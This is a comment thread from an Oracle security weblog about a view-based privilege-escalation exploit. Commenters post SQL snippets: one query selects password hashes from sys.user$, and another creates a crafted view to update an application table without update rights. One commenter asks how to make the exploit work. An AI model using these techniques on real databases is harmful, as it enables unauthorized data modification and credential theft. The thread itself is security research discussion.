Pete Finnigan's Oracle security weblog

Jr says:

From user TEST with the privileges as shown, doesn't work :

SQL> desc sys.user$
ERROR:
ORA-04043: object sys.user$ does not exist

neither :

select x.name,x.password from sys.user$ x left outer join sys.user$ y on
*
ERROR at line 2:
ORA-00942: table or view does not exist

bunker says:

Obviously sys.auth$ must be accessible by the target user (normally dbsnmp or application users can do that).

Otherwise you can use the sample to craft a special view that can access everything you want with only the select privilege (i think about insert or update on application's tables and more...)

Bye!

seydon says:

Hi.

Tried this.
don’t work.

USERS PRIVILEGE:
CREATE SESSION
CREATE VIEW.

Have right for select on table Contragent.
Write script:
create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id;
update test_hack_view set insiderid='1' where id='12345';

GO/

and receive error:
ORA-01031: insufficient privileges.

What’s right I must have for this exploit?

Pete says:

As i pointed out in the post, the code as described wont work as a user with simple privileges cannot access SYS.USER$ but as bunker points out the attack is useful if you have access to a user who does have access to key tables.

The exploit is fine, the issue is its usefulness for a user with limited privileges as bunker points out in this case the main usefulness would be to attack tables the user can see for example application data.

cheers

Pete